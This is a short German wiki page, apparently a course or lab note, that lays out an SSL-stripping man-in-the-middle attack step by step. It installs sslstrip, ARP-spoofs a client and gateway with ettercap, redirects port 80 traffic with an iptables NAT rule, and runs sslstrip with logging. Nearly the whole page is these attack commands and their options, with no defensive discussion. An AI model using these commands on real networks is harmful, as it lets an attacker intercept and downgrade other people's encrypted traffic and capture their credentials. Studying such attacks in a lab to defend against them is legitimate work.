Ssl strip Dowwngrade

Aus xinux.net
Zur Navigation springen Zur Suche springen

Vorbereitung

  • apt install sslstrip

Erstes Fenster

Arpsoofing

  • CLIENT=10.0.10.102
  • GATEWAY=10.0.10.1
  • INTERFACE=eth0

Befehl

  • ettercap -i $INTERFACE -Tq -M ARP /$CLIENT// /$GATEWAY//
optionen
-i eth0            =   Interface
-T                 =   Textmodus
-q                 =   still 
-M arp             =   ARP Spoofing

Zweites Fenster

Firewallregeln

  • iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

Ssl Strip

  • sslstrip -a -f -k -w sslstrip.log